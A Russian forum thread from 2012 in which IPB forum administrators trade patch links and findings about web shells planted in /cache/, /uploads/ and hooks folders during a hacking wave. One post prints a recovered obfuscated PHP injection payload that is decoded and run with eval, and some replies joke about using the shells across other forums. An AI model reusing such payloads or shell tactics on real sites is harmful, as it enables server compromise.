Опубликовано: 2 ноября 201213 г ИБРовцы похоже еще спят http://forums.ibresource.ru/index.php?/topic/64826/ :)если прошурстить у них в /cache/ наверняка и шелл найдется) Патчи от 6 ноября 2012 для ИБР версийhttp://ipbskins.ru/forum/topic10798.html/page__view__findpost__p__70490
Опубликовано: 8 ноября 201213 г Автор Patch level 2 для всех русских версий (локализаций ибр) от 6 ноября. IPB 3.3xipb33ru_nov12.rar IPB 3.2xipb32ru_nov12.rar IPB 3.1xipb31ru_nov12.rar
Опубликовано: 8 ноября 201213 г Ёёё, а тут оказывается целая тема, почему не видел???? :o Сидим на IPB как на мине замедленного действия, и когда она сработает, Бог его знает.. :(
Опубликовано: 8 ноября 201213 г Я сейчас в Минске и не имею доступа... Проверьте нас, кто может. Один sh.php я до патченья тут удаляла из папки кэш.
Опубликовано: 8 ноября 201213 г Как минимум, есть еще такой: http://ipbskins.ru/forum/sh.php :) Сейчас посмотрю.
Опубликовано: 8 ноября 201213 г И еще были: /cache/9ed28f49e4a432d582c27def5cb172e3.php/cache/cache_clean.php
Опубликовано: 8 ноября 201213 г Автор Так же замечено, что заливают шелл в uploads (uploads/profile) под видом jpg файла, в большинстве случаев с названием photo-128.jpg размер ~67.38 KB. В принципе такой шелл бесполезен, так как php там не исполняется (в нормальной среде), но по каким-то, пока необъясним причинам, у некоторых пользователей форум все же их исполняет. Поэтому следует иметь ввиду и проверится.
Опубликовано: 8 ноября 201213 г А ведь можно написать скрипт, который будет ходить по всем форумам, искать на них sh.php и остальные версии, и, если найдет, выполнять через этот шел удаление всех шелл-файлов и установку патча :)
Опубликовано: 8 ноября 201213 г Добавлю в коллекцию:/cache/2f617aab0a2e830c7370a745b88af170.php/cache/ipbcache.php/cache/view-cache.php Содержимое то же.
Опубликовано: 8 ноября 201213 г Автор А ведь можно написать скрипт, который будет ходить по всем форумам, искать на них sh.php и остальные версии, и, если найдет,Ага, а если не найдет - залить. :) И повесить скрипт на ипбскинсе
Опубликовано: 9 ноября 201213 г В другой теме обещал, здесь выкладываю. Может кому будет интересно и полезно на будущее. Здесь видно содержимое корневой директории одного из сайтов взломанного аккаунта, где как раз в папке forum стоит IPB:В корне стоит ABO.CMSПодчеркнул "лишние" папки и файлы, а также стандартные, если их подменили. Содержимое одной из "лишних" папок: Тут директория кеша IPB, там видны самые "старые" чужеродные файлы, датируются от 16:00 4 ноября. Это самые "старые" занесенные на площадку файлы, видимо с них все и началось: Выгребать столько дерьма (в каждую из "нормальных" обязательно папок что-то напихали) было нереально, все равно была опасность оставить где-то "хвостик" заразы. Выручил бекап за утро 4 ноября, с предварительным удалением всего что есть на площадке (не только в директории www). Вот что странно, а как зараза вылезла выше директории сайта, захватила другие сайты этого акканта? Судя по дате заражения других сайтов этого пользователя, видимо все же посадили (через его же сайт) заразу на комп, откуда заходили в панель хостинга (сейчас, пока распаковывал бекап, антивирус постоянно ругался и поместил в карантин около 20 файлов, их на скринах не видно, все они лежали в корне сайта).
Опубликовано: 9 ноября 201213 г (Продолжение) Содержимое wchckd.php: ============================================================================== ========================= END =================================== ========================= /forum/index.php?<?print(512314);print(512314);die;?> =================================== ============================================================================== Содержимое файла wchckd4.php: ============================================================================== ========================= END =================================== ========================= /forum/index.php?<?$d=substr(8,1);foreach(array(36,39,112,49,39,93,59,36,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,11,6,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d);exit;?> =================================== ==============================================================================
Опубликовано: 9 ноября 201213 г Папку hooks тоже проверяйте, кто еще не делал, туда тоже зараза ложится.
ИБРовцы похоже еще спят http://forums.ibresource.ru/index.php?/topic/64826/ :)
если прошурстить у них в /cache/ наверняка и шелл найдется)
Патчи от 6 ноября 2012 для ИБР версий
http://ipbskins.ru/forum/topic10798.html/page__view__findpost__p__70490